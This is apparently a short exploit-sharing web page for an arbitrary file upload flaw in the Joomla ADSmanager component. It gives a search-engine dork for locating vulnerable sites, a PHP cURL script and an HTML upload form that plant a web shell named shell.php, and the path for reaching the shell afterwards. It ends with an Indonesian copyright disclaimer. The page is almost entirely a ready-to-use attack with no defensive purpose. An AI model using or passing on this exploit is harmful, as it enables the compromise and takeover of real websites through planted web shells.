Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
Joomla ADSmanager Exploit Arbitrary File Upload Vulnerabilit
Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org
CODE PHP :<?php$url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here$post = array(“file” => “@shell.jpg”,“name” => “shell.php”);$ch = curl_init (“$url“);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0″);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);curl_setopt ($ch, CURLOPT_POST, 1);@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);$data = curl_exec ($ch);curl_close ($ch);echo $data;?>#CSRF :<form method=”POST” action=”TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component”enctype=”multipart/form-data”><input type=”file” name=”files[]” /><button>Upload</button></form>
Acces Shell: site.com/tmp/plupload/shell.php
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.